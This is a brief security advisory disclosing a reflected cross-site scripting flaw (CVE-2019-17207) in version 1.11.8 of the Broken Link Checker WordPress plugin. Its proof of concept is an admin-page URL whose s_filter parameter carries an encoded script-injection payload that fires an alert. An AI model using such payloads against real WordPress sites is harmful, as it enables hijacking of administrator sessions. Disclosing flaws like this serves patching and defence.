WordPress Broken Link Check plugin version 1.11.8 suffers from a cross site scripting vulnerability.

MD5 | f4e5f99e5386047d6bb5b0fef5bf7606

Document Title
===============
Reflected XSS via `Broken Link Checker` v.1.11.8 WordPress plugin.

Product Description
===============
Broken Link Checker will monitor your blog looking for broken links and let
you know if any are found.

Homepage: https://managewp.com/
WordPress Plugin: https://wordpress.org/plugins/broken-link-checker/

PoC
===============

1) Login to your wordpress webpage
2) Navigate to the following page (Make sure the `s_link_text` parameter
returns a valid link on your blog:

http://localhost:8889/wp-admin/tools.php?page=view-broken-links&filter_id=search&s_link_text=word&s_link_url&s_http_code&s_filter=%27%3E%22%3E%3Cimg%20src%3D1%20onerror%3Dalert(1337)%3E&s_link_type&search_button=Search+Links

3) Note the form alerts and the payload within the `s_filter` parameter
executed.


CVE-2019-17207


Source